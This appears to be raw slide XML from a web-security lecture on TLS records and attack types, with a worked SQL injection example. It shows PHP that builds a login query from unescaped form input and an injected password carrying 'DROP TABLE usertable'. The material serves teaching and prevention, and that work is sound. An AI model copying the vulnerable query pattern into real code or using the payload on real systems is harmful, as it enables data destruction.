              <a:t>HTTPS, SMTP, VPN, SIP, …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7733388-FB5D-264E-A781-B4DD5072D1F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21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="251454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TLS (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" altLang="ko-KR" dirty="0"/>
              <a:t>Transport Layer Security)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="864382" y="2489200"/>
            <a:ext cx="7565634" cy="3530600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2200" dirty="0"/>
              <a:t>The TLS protocol exchanges records</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
              <a:t>encapsulate the data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
              <a:t>can be compressed, padded, appended with a message authentication code (MAC), or encrypted, all depending on the state of the connection. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
              <a:t>has a content type field that specifies the record, a length field and a TLS version field</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{486ABCAC-045B-5544-8510-0FD4DC4AB971}"/>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22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="269582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types of attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="905434" y="2234068"/>
            <a:ext cx="7952816" cy="4385790"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>We will learn several modes of attacks and how to prevent those attacks:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Phishing attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Fool the users  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Network attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Attack the connection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Code injection attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attack the server or browser (e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> injection, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>StoredXSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ReflectedXSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Other attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>….</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4902D97E-E067-CF4E-B40F-79C45A67801D}"/>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23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="420871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559472"/>
            <a:ext cx="8165668" cy="914400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Code injection Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="339726" y="2227795"/>
            <a:ext cx="8574087" cy="4800600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Attacker tricks victim application into executing code designed by the attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Happens in situations where code and the data are intermixed and victim fails to properly escape data values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>There are various kinds of code injection attacks as follows:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0"/>
              <a:t>SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0"/>
              <a:t>a technique which uses query reformulation through the input parameter</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="628650" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0"/>
              <a:t>Stored XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0"/>
              <a:t>Reflected XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.youtube.com/watch?v=uSw0IoSr3Hk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>“What is SQL injection Attack”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="628650" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{823E3533-E640-8E4D-9357-FA887144069F}"/>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24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="215578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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="488515" y="2151760"/>
            <a:ext cx="8236385" cy="4114569"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Assume that your server code generates SQL query directly based on the input, which is provided by the user form a form</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="표 5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="852550" y="4727847"/>
          <a:ext cx="7831173" cy="1654288"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="7831173">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="1654288">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>$username = $_POST[ “username” ];</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>$password = $_POST[ “password” ];</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>$query = “SELECT * FROM </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" err="1">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>usertable</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> WHERE username=‘$username’ AND password=’$password’”;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852550" y="3098849"/>
            <a:ext cx="3429000" cy="1371600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC7B24D5-0DAA-5B4B-8857-A8DC654B69E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25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="145076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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="852549" y="2175276"/>
            <a:ext cx="7872351" cy="4091053"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Most users put their own username and password so the SQL query will look like this:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>   SQL Query:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="표 5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="852549" y="4922373"/>
          <a:ext cx="7872350" cy="1090120"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="7872350">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="1090120">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>SELECT * FROM </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>usertable</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> WHERE username=‘Soonja’ AND password=</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="2400" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> ‘</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>123123’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6" name="Picture 5"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3458292" y="2860819"/>
            <a:ext cx="3365695" cy="1388278"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{990A12C9-157B-B34C-B0A7-138675A98C5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26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="366152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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429491" y="2140002"/>
            <a:ext cx="8295409" cy="4126327"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>However, what would be happened if the attacker put the following password value into the form:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The system will generate the SQL query like this and it will drop the table ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>usertable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>’ directly:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="표 5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="852551" y="5644562"/>
          <a:ext cx="6913586" cy="701040"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6913586">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="700612">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>SELECT * FROM </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" err="1">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>usertable</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> WHERE username=‘Soonja’ AND password=’123123`;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="2000" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Drop TABLE </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="2000" baseline="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>usertable</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="2000" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>; </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="16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표 5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="852551" y="2886315"/>
          <a:ext cx="5627853" cy="463840"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="5627853">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="463840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr latinLnBrk="1"/>
                      <a:r>
